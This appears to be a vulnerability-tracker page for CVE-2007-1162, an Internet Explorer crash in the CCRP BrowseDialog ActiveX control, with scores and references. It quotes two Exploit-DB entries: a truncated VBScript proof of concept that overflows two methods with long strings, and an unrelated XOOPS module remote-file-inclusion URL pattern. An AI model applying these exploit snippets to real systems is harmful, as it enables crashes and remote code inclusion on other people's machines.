CVE-2007-1162
Published: 2007-03-02
Priority: P429 | high | 7.8 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C
EXPLOIT
EPSS: 3.06% (86.0th percentile)
A certain ActiveX control in the Common Controls Replacement Project (CCRP) CCRP BrowseDialog Server (ccrpbds6.dll) allows remote attackers to cause a denial of service (Internet Explorer 7 crash) via a long (1) IsFolderAvailable or (2) RootFolder property value, different vectors than CVE-2007-0371.
No detection rules found.
Exploit-DB
XOOPS Module horoscope 2.0 - Remote File Inclusion
exploitdb·2007-06-12
CVE-2007-3236 XOOPS Module horoscope 2.0 - Remote File Inclusion
---
BeyazKurt - [email protected]
XOOPS Modules Horoscope
http://www.xoops.org/modules/repository/visit.php?cid=32&lid=1162
modules/horoscope/footer.php?xoopsConfig[root_path]=
{NetLife Since : '2003-4'}
Retired hacker BeyazKurt - I quit the net! My comeback will be perfect ;(
# milw0rm.com [2007-06-12]
Exploit-DB
BrowseDialog Class - 'ccrpbds6.dll' Multiple Denial of Service Vulnerabilities
exploitdb·2007-02-21
CVE-2007-1162 BrowseDialog Class - 'ccrpbds6.dll' Multiple Denial of Service Vulnerabilities
---
BrowseDialog Class (ccrpbds6.dll) multiple methods Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Soundtrack: "Zeta Reticoli" (Meganoidi)
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
I found two other methods in this DLL that are unable to handle long strings.
It seems to be a Stack Overflow, but I'm not sure of this :)
IsFolderAvailable
RootFolder
Quoting...
Sub tryMe
on error resume next
if Pucca.value="IsFolderAvailable" then
argCount = 1
arg1=String(1000000, "A")
BrowseDialog.IsFolderAvailable arg1
BrowseDialog.IsFolderAvailable arg1
elseif Pucca.value="RootFolder" then
argCount = 1
arg1=String(1000000, "A")
Br
No writeups or analysis indexed.
http://osvdb.org/34963
http://www.securityfocus.com/bid/22645
http://www.securityfocus.com/data/vulnerabilities/exploits/22645.html
https://www.exploit-db.com/exploits/3350
2007-03-02
Published